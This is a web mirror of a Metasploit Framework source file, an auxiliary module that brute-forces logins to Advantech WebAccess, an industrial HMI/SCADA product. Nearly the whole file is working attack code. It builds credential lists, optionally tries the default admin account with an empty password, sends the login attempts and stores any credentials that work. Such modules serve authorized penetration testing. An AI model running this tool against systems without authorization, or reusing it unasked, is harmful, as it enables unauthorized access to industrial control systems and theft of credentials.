Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/advantech_webaccess_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/advantech_webaccess'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Advantech WebAccess Login',

20
        'Description' => %q{

21
          This module will attempt to authenticate to Advantech WebAccess.

22
        },

23
        'Author' => [ 'sinn3r' ],

24
        'License' => MSF_LICENSE,

25
        'DefaultOptions' => {

26
          'RPORT' => 80

27
        },

28
        'Notes' => {

29
          'Reliability' => UNKNOWN_RELIABILITY,

30
          'Stability' => UNKNOWN_STABILITY,

31
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),

39
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:[empty]', false])

40
      ]

41
    )

42
  end

43


44
  def scanner(ip)

45
    @scanner ||= lambda {

46
      cred_collection = build_credential_collection(

47
        username: datastore['USERNAME'],

48
        password: datastore['PASSWORD']

49
      )

50


51
      if datastore['TRYDEFAULT']

52
        print_status("Default credential admin:[empty] added to the credential queue for testing.")

53
        cred_collection.add_public('admin')

54
        cred_collection.add_private('')

55
      end

56


57
      return Metasploit::Framework::LoginScanner::AdvantechWebAccess.new(

58
        configure_http_login_scanner(

59
          host: ip,

60
          port: datastore['RPORT'],

61
          cred_details: cred_collection,

62
          stop_on_success: datastore['STOP_ON_SUCCESS'],

63
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

64
          connection_timeout: 5,

65
          http_username: datastore['HttpUsername'],

66
          http_password: datastore['HttpPassword'],

67
          uri: target_uri.path

68
        )

69
      )

70
    }.call

71
  end

72


73
  def report_good_cred(ip, port, result)

74
    service_data = {

75
      address: ip,

76
      port: port,

77
      service_name: 'http',

78
      protocol: 'tcp',

79
      workspace_id: myworkspace_id

80
    }

81


82
    credential_data = {

83
      module_fullname: self.fullname,

84
      origin_type: :service,

85
      private_data: result.credential.private,

86
      private_type: :password,

87
      username: result.credential.public,

88
    }.merge(service_data)

89


90
    login_data = {

91
      core: create_credential(credential_data),

92
      last_attempted_at: DateTime.now,

93
      status: result.status,

94
      proof: result.proof

95
    }.merge(service_data)

96


97
    create_credential_login(login_data)

98
  end

99


100
  def report_bad_cred(ip, rport, result)

101
    invalidate_login(

102
      address: ip,

103
      port: rport,

104
      protocol: 'tcp',

105
      public: result.credential.public,

106
      private: result.credential.private,

107
      realm_key: result.credential.realm_key,

108
      realm_value: result.credential.realm,

109
      status: result.status,

110
      proof: result.proof

111
    )

112
  end

113


114
  def bruteforce(ip)

115
    scanner(ip).scan! do |result|

116
      case result.status

117
      when Metasploit::Model::Login::Status::SUCCESSFUL

118
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")

119
        report_good_cred(ip, rport, result)

120
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

121
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)

122
        report_bad_cred(ip, rport, result)

123
      when Metasploit::Model::Login::Status::INCORRECT

124
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")

125
        report_bad_cred(ip, rport, result)

126
      end

127
    end

128
  end

129


130
  def run_host(ip)

131
    unless scanner(ip).check_setup

132
      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Advantech WebAccess')

133
      return

134
    end

135


136
    bruteforce(ip)

137
  end

138
end

139


140